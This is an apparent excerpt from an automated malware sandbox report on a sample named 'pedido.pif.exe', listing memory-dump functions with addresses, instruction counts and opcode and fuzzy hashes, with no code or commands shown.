Opcode ID: 99d2e5f842c43bc88014062e0380ab740b3f1d0c30c8421fc99505a2d43d1a0a
Instruction ID: 5cbe29b6691aee242cc59740196182c570e17d95d6d8c5d67abfcd90e2ed8918
Opcode Fuzzy Hash: 99d2e5f842c43bc88014062e0380ab740b3f1d0c30c8421fc99505a2d43d1a0a
Instruction Fuzzy Hash: 9EF0F9306146159FC398DB2EC848E55BBE6BF89224769C6A9E029CB3B6DB70DC018B45

Function 05A772E8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca3257c4f86372089fb2abd0f09cd132dd84bed4e714630b7e7e98f564b4c2e3
Instruction ID: 9627f3873197a96a4ff5af6c1ff60911636ef77d1f3344af0cec03b4ba6775d6
Opcode Fuzzy Hash: ca3257c4f86372089fb2abd0f09cd132dd84bed4e714630b7e7e98f564b4c2e3
Instruction Fuzzy Hash: 48F0EC7060574CCAFB34A7548D04B3A77B8EF9130AF19C46BD85C8A582C67BC447C796

Function 05A77CF0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18409342bdd52a9d5c84dafddcd4338204f0506a94d265caf2c02138c3830982
Instruction ID: 7115fe440c9a2ce902d1023d5266f5affedd99e11786b32541b96c2509df40c4
Opcode Fuzzy Hash: 18409342bdd52a9d5c84dafddcd4338204f0506a94d265caf2c02138c3830982
Instruction Fuzzy Hash: 10E086D95081808BF3459AF41C4838A7FA9DBE9309F1FD5B99967552D3DC2C004BC195

Function 05A771E0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f216de8885613d545460a16bcbe20597d665c1e7de0fd882f32b6cbf093dd40
Instruction ID: 2f492fd7221546f3efdbf113d62594ab3e3abd1f0f0470359ad52f12d61e2581
Opcode Fuzzy Hash: 3f216de8885613d545460a16bcbe20597d665c1e7de0fd882f32b6cbf093dd40
Instruction Fuzzy Hash: A6E092322002586BCB019E5EE800EAFBFDEEBCC611B048516F959C3111CB75D91197A5

Function 05A77A00 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1808ec4e188a1efee8a3c602f20c549c9d6a30c89d5b3233d088278b393babd5
Instruction ID: 6e6971d56c30f59c489b74066ecd8cdd39485419f1a33226eb749e82dc821505
Opcode Fuzzy Hash: 1808ec4e188a1efee8a3c602f20c549c9d6a30c89d5b3233d088278b393babd5
Instruction Fuzzy Hash: DED0222278D3A45BCB1A3BB43C2406C3F9A4BCA62130A80DFD608CB282DDA0880043E3

Function 05A7C4E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3ad4fbbb81ab930ae4422785510e48c5fb9ec20f511acd87a245c8b479ce5e0
Instruction ID: 6d35240b7543b30f436e30befc1a1b1b8d2cfeebccfcac9f28997f63c9176b95
Opcode Fuzzy Hash: f3ad4fbbb81ab930ae4422785510e48c5fb9ec20f511acd87a245c8b479ce5e0
Instruction Fuzzy Hash: 6EC01231124309CBD909E776E889555377EFAC05057409510E42909159DF785C4447A1

Function 05A7C4DA Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074719561624c35019bdca2f384d03af5305287571defb6944e397ad0a5dbfe5
Instruction ID: 7f34c4bea2b0321d56abd51c097f64c3598874ac355fb7b29a8f1ee9bc0aeebf
Opcode Fuzzy Hash: 074719561624c35019bdca2f384d03af5305287571defb6944e397ad0a5dbfe5
Instruction Fuzzy Hash: A6D01231124315CBD909EBB6F989558373FFAC45057009920E8291D25DDF784D858791

Function 05A77A10 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa6a324b4a3dc63de1da8655c699a128cd383a862dacc7bebc84902b707d56a
Instruction ID: 8b201aa6343ad48fd062611084bd6f7ea50f30819eadf1f1b88ec32429106c04
Opcode Fuzzy Hash: afa6a324b4a3dc63de1da8655c699a128cd383a862dacc7bebc84902b707d56a
Instruction Fuzzy Hash: 3EC09B3574D13C13460C377D745446D76CE57C9661344806EE509C33458D655D4117D5

Function 05A75F2C Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3960484c2619c1067b62e5dcfc1b26bf248d70a30b43b561632f5699a79cf1c4
Instruction ID: 9c01680e4c39425cb4e8ffa09e3fe3e0ca3a0655a1d075d436c681300ba47ff6
Opcode Fuzzy Hash: 3960484c2619c1067b62e5dcfc1b26bf248d70a30b43b561632f5699a79cf1c4
Instruction Fuzzy Hash: 60C02B3035934043E104D3184CC0F2E5E74EFE0700F84CC07E80C0A102C520880A9717

Function 05A7761C Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1498714208.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a70000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d9a9a6d7cc3975c46cf1f43e2b5a28389c547fab3d53bab17a6abc39c62295
Instruction ID: f59e206623f0de6a938ac3b1607a650144abf849ec43cafc8aa2ba2d4cb2b92e
Opcode Fuzzy Hash: b4d9a9a6d7cc3975c46cf1f43e2b5a28389c547fab3d53bab17a6abc39c62295
Instruction Fuzzy Hash: 6CB01236A1004CC6CF00DEC8F4003ECB739E780236F000063C20861000C330036C86E2

Non-executed Functions

Function 0752F90F Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce51de1a9821e115a2c6eba338cf82de6c960120fa1d94e278a855f70428cad
Instruction ID: fa6f5c1400240d0eb080ef7251c388791319c5c9ca8b18b846fcc0cec287e5c2
Opcode Fuzzy Hash: 3ce51de1a9821e115a2c6eba338cf82de6c960120fa1d94e278a855f70428cad
Instruction Fuzzy Hash: 1CE1FBB4E142198FDB14CFA9D5809AEBBF2FF89305F24815AD414AB395D730AD42CF60

Function 0D6A147A Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d80b0bcc47f7a58fc17334bbba02718d252542d2fb6414fac3b29af3534307c8
Instruction ID: e8fa5d14c65cae1cb5c5a6543c333b86d12a525b7a7310c7b9ed7ed49d57f6e7
Opcode Fuzzy Hash: d80b0bcc47f7a58fc17334bbba02718d252542d2fb6414fac3b29af3534307c8
Instruction Fuzzy Hash: EED139B1E002158FCB14CF5DC5846ADBBF2AF8A305F6881AAD459AB351D739DD42CFA0

Function 07524690 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309d5f4a770cc36516b8a08124d96aa4f4f44f897783f7fb93f726ce6793dd41
Instruction ID: 04ce8da5c250960080c815285148e3b1cf09d9b2bbb539847c3d3e5a5d4bdaeb
Opcode Fuzzy Hash: 309d5f4a770cc36516b8a08124d96aa4f4f44f897783f7fb93f726ce6793dd41
Instruction Fuzzy Hash: 54E1FAB4E102698FDB14DF99C580AAEBBF2FF89305F248159D414AB355DB30AD42CF61

Function 07524F88 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9099ab7cd552dcb508346035f08c24c31876ba768c4a01d5cbae498b92824b
Instruction ID: c3ee252d92f5213b4473b9296d1f206125f38e3cfc4c2c793073fbadc6c2e3d8
Opcode Fuzzy Hash: 9c9099ab7cd552dcb508346035f08c24c31876ba768c4a01d5cbae498b92824b
Instruction Fuzzy Hash: 19E1EAB4E102298FDB14CFA9C5809AEBBF2FF89305F248159D454A7395D7319D42CFA1

Function 07524AC8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17c4559c72e69088d2fe582210a7a98f2ccab4d74ae70cf02c1eff1bea479b3
Instruction ID: 79272a7aad08029ee2486767da5dc4320a2d1203df8f69dcd5fb6dac58bc8b3d
Opcode Fuzzy Hash: f17c4559c72e69088d2fe582210a7a98f2ccab4d74ae70cf02c1eff1bea479b3
Instruction Fuzzy Hash: B9E10AB4E102698FDB14CFA9C580AAEBBF2FF89305F248159D414AB355D731AD42CF61

Function 07525838 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ecfb14a8f379095f289d027b9ce9f79f0f9fe386050ed26c3a387307b2159c
Instruction ID: 2ada7acf206c63b7830c65401998809dd3f8eddc53a1fde7f057e6cdff8a5aa0
Opcode Fuzzy Hash: 78ecfb14a8f379095f289d027b9ce9f79f0f9fe386050ed26c3a387307b2159c
Instruction Fuzzy Hash: 50E1FAB4E102198FDB14DFA9C580AAEBBF2FF89305F248159D415AB395DB30AD42CF61

Function 0D6A0040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e665f1980a8feb53813ddacd98dabf7e4161bdb5cf42e4e7a203fd6c3d1448
Instruction ID: d8713e62cd010e934ad98895497275108b5eca6010b66982658fa0bf0d36f444
Opcode Fuzzy Hash: b1e665f1980a8feb53813ddacd98dabf7e4161bdb5cf42e4e7a203fd6c3d1448
Instruction Fuzzy Hash: F2E1D474E102198FDB14CFA9C580AAEBBB2FF89305F248169D458AB359D735AD42CF60

Function 0D6A1F58 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e135b55da7207c7566e54d66354600fbf4db15ce382595db13e6244048fb253d
Instruction ID: 4195ec063233cfb7d60cc608dbfacbd8307b0e9f950964183e01231a53164143
Opcode Fuzzy Hash: e135b55da7207c7566e54d66354600fbf4db15ce382595db13e6244048fb253d
Instruction Fuzzy Hash: 92E1F674E102198FDB14CFA9C590AAEBBF2FF89305F248169D854AB355D731AD42CF60

Function 0D6A1B20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3927c48bb013c66c3202520df4d43b856bacbd7c19d8cc7daa47854c3d5f2b13
Instruction ID: 7908c7e77c1f2db20f0c7d0e23192e6d7c1d63f30ccd9c907b454c66df9d149a
Opcode Fuzzy Hash: 3927c48bb013c66c3202520df4d43b856bacbd7c19d8cc7daa47854c3d5f2b13
Instruction Fuzzy Hash: 1DE1F474E102198BDB14CFA9C580AAEFBF2FF89304F248169D855AB355D734AD42CF60

Function 0D6A16E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1607983b844f1a098ef762d477ce415de04653abdbd9c8c246ae937095c7c096
Instruction ID: 9f94819723fc50687763db05c440b0c331b1d5937d1a724d620fc465a30b6b8f
Opcode Fuzzy Hash: 1607983b844f1a098ef762d477ce415de04653abdbd9c8c246ae937095c7c096
Instruction Fuzzy Hash: 4CE1E674E102198FDB14CFA9C580AAEBBF2FF89305F24816AD455AB355DB34AD42CF60

Function 075281D7 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2675439af703be0016b87ec77f107c9e3d17255763861c123b0ae59f3c5752d
Instruction ID: d243e233f05fcbf1c9c7d880986d19b8ab601fe0a413d04d82a80fef95143d1e
Opcode Fuzzy Hash: e2675439af703be0016b87ec77f107c9e3d17255763861c123b0ae59f3c5752d
Instruction Fuzzy Hash: ECD1E13582075A9ACB10EBA4D990AD9B7B1FF95300F21D79AD4093B210EF706ED9CB91

Function 012FD684 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1493760788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da12c75b5bbefa3769b0f471100480ca1e9fcc50a489f74c8c96ee564584b6ff
Instruction ID: c691f1f3da5caf5cb94c32c1c0e7b1c88dae8806443c5c6477a0725ba4f39281
Opcode Fuzzy Hash: da12c75b5bbefa3769b0f471100480ca1e9fcc50a489f74c8c96ee564584b6ff
Instruction Fuzzy Hash: 0FA14D36E102168FCF05DFA8C9845AEBBB2FF85300F15857EEA05AB255DB71E945CB40

Function 075281E8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa9ee7fb598d7224955db719116bba2ed40c25f9daf5d3ca2ecb8d21825f5bd1
Instruction ID: 7b1ace4fbd4dd4ec9a77a9aaa62b6466f0bfccdb14bcab9d6ab5b79220f10660
Opcode Fuzzy Hash: aa9ee7fb598d7224955db719116bba2ed40c25f9daf5d3ca2ecb8d21825f5bd1
Instruction Fuzzy Hash: 2AD1D13582075A9ACB10EBA4D990AD9B7B1FF95300F20D79AD4093B210EF706ED9CB91

Function 075293E8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2a8806bf49536ddd2ca7ade70fd0fe1c224b04176276f1c03f61224e2ae943
Instruction ID: 4c9865adce614a8a0be6de36c4c6f4d11fd2329d0ff952df822f1e39ce397684
Opcode Fuzzy Hash: de2a8806bf49536ddd2ca7ade70fd0fe1c224b04176276f1c03f61224e2ae943
Instruction Fuzzy Hash: FA716DB5E052198FDB08DFAAC584ADEFBF2BF89300F14C166E419AB355D734A942CB50

Function 0D6A1F51 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1501839453.000000000D6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D6A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6a0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f71f175c3267a54b9b613b53ba3492b28c7ab83572eada98ff23f3e90446a3
Instruction ID: ea1e84010225f1cdb3897b66800a1473d3526c7e49033de400d397f1ae3ee0da
Opcode Fuzzy Hash: 63f71f175c3267a54b9b613b53ba3492b28c7ab83572eada98ff23f3e90446a3
Instruction Fuzzy Hash: 1251F674E102298BDB14CFA9C9906AEBBF2FF89300F24C16AD458A7355D7319D42CFA5

Function 075293D9 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1499963788.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ae0e49cd7aa1cb94a05283cf9f863b2c1ae677d9ae9b60d01f5c048499dc99
Instruction ID: 8bf631deaf1808bdfe4eeef881aa0e9ef9ecf9197fc54f7bc64478bc425eebfa
Opcode Fuzzy Hash: 50ae0e49cd7aa1cb94a05283cf9f863b2c1ae677d9ae9b60d01f5c048499dc99
Instruction Fuzzy Hash: DB516FB5E046198FDB08DFAAD9846DEFBF2BF89300F14C16AD418AB354DB3499468B50

Analysis Process: pedido.pif.exePID: 5188, Parent PID: 3508COMMON

Executed Functions

Function 01249858 Relevance: .9, Instructions: 856COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62df301c6fc185603405365140c5184a8e2a13101b58503718505b2b1d6b0cb1
Instruction ID: fd0410febe0ad6b0537f8fff2b7193e7fb179027e2bb219cf277fdea8f85879d
Opcode Fuzzy Hash: 62df301c6fc185603405365140c5184a8e2a13101b58503718505b2b1d6b0cb1
Instruction Fuzzy Hash: DC728171A1020ADFCF19CF68C884AAEBBF2FF88314F158555E9069B3A1D731E981CB50

Function 058EEE09 Relevance: .8, Instructions: 850COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49d6f80097b9062ff90e4be7d244125862b9388c1685092a821e66da1046b5b0
Instruction ID: 48921094eb7ecea9e3750c474eb6a0cbf97f40da5bbc9d22ed5d5531bcb38fbb
Opcode Fuzzy Hash: 49d6f80097b9062ff90e4be7d244125862b9388c1685092a821e66da1046b5b0
Instruction Fuzzy Hash: 8792B174A01229DFDB65EF24D994BADBBB2FB8A301F1081E9D809A7354DB315E81DF40

Function 0124E431 Relevance: .7, Instructions: 713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d54234c98a48a22a1ea940910beaec94dffa1e72c8c8a905cfd41bc65012bee
Instruction ID: c147ae5db91b7d8fcd18391ed5635210c7728d6c5e77eadee6d47e18b2999e93
Opcode Fuzzy Hash: 2d54234c98a48a22a1ea940910beaec94dffa1e72c8c8a905cfd41bc65012bee
Instruction Fuzzy Hash: 5272DF74E012298FEB65DF69C884BDDBBB2BB49300F1481EAD449A7355EB349E81CF40

Function 01246108 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f5290ecdbafc7b82ff14bcffbdb4f794ffbdfebf116f58b8309b3efe4429d5
Instruction ID: 9cfb693fddd5a4c55bb02b63c2f832a6447c137e1e737e53b5941ad8a74420a2
Opcode Fuzzy Hash: 88f5290ecdbafc7b82ff14bcffbdb4f794ffbdfebf116f58b8309b3efe4429d5
Instruction Fuzzy Hash: BD129D70A102199FDB18DF69D844BAEBBF6FF89300F148529E506EB395DB349D41CB90

Function 01246730 Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47ebf6e96ec727b93d2a3276e2799d129c6694d3d10d2c6285c70b02b7a1d2bd
Instruction ID: 0b993692abc5305d3b27b6776a98cf73448b6ac1eb129e8b0192cf7b3ef3f5c3
Opcode Fuzzy Hash: 47ebf6e96ec727b93d2a3276e2799d129c6694d3d10d2c6285c70b02b7a1d2bd
Instruction Fuzzy Hash: 3D026270A1021ADFDB19CFA9C988AADBBF6FF89304F148069E505EB2A1D771DD41CB50

Function 0124B328 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0105032935b9d36954a822aa9c2bd147f6117ad7b8f32760198c80f77d3f245
Instruction ID: 339c3027e98557080f38aa067add21af61e1789a97ae3434b4ecbe59d6b96c54
Opcode Fuzzy Hash: a0105032935b9d36954a822aa9c2bd147f6117ad7b8f32760198c80f77d3f245
Instruction Fuzzy Hash: E6E1F675E10659CFDB18CFA9C894A9DBBB2FF88310F158069E919AB361DB30E841CF50

Function 058E85B0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49c6181e1f6abbb13cb8bb1a98a563b600e63c33e619b92035236c05fedae00
Instruction ID: 69a812e41086148acde913ce0fe8ad6232bfec565bede26d3f6fba7c440ac2db
Opcode Fuzzy Hash: c49c6181e1f6abbb13cb8bb1a98a563b600e63c33e619b92035236c05fedae00
Instruction Fuzzy Hash: E5E1A174E01218CFEB14DFA5D944B9DBBB2BF89304F1081A9D809A7395DB355E85CF10

Function 0124F778 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3874752755.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1240000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f3ef17e56f330ba08b19023e9d225ddef9f9ddc8c6ae4bf0bd7190b1767a0f
Instruction ID: eb22fca383bb9dcbbd8e9a6689796bb8667197a9317c2d98d6d6ee9335365938
Opcode Fuzzy Hash: 14f3ef17e56f330ba08b19023e9d225ddef9f9ddc8c6ae4bf0bd7190b1767a0f
Instruction Fuzzy Hash: 6AD1B074E00218CFDB14DFA9D994B9DBBB2BF89300F2081AAD809AB355DB355E81CF50

Function 058EC580 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6199ec70891fe1683539a5611a0836194d36e0bd57015b4762cdc62b6c5b0f
Instruction ID: 18738a9533a772fac3383adbe5cf0c56b901bf6ae1fc9ff8f8f47ab90d5a6470
Opcode Fuzzy Hash: 9d6199ec70891fe1683539a5611a0836194d36e0bd57015b4762cdc62b6c5b0f
Instruction Fuzzy Hash: 54A18175E01228CFEB28CF6AD944B9DBAF2BF89300F14C1AAD409A7255DB345E85CF51

Function 058E9FB0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64abc3db1029a6860bf9cd5d2a5db020b42ec7aadf8a77cc2fce778bc0190d69
Instruction ID: 25ac78806462ae46816d814ce11924268c80c6e4d0c56a8345b147b2f531d654
Opcode Fuzzy Hash: 64abc3db1029a6860bf9cd5d2a5db020b42ec7aadf8a77cc2fce778bc0190d69
Instruction Fuzzy Hash: 4BA1A075E012188FEB28DF6AC944B9DBAF2BF89300F14C0AAD80DB7255DB345A85CF11

Function 058EBF30 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca640781df75834ba334e84bd3c5ad977f1d397446df1002ebf0ee6b0e690c4a
Instruction ID: c375c0b732e8a8b887b2816ef8454ecfcf20b0b8f0189ef1f26e9dcab9fd78e4
Opcode Fuzzy Hash: ca640781df75834ba334e84bd3c5ad977f1d397446df1002ebf0ee6b0e690c4a
Instruction Fuzzy Hash: 45A18075E012188FEB28DF6AD944B9DBAF2BF89300F14C1AAD80DA7255DB305E85CF51

Function 058EB290 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3881676112.00000000058E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_58e0000_pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be8e0765c107ef4b95f832c0592b8d60d28b1e45b790bf665b8bc1e52c3409f8
Instruction ID: 4d4b1f50d0320b477876c0c5198751be2f848f6aafdbc7f6adfb89f14d9c0f81
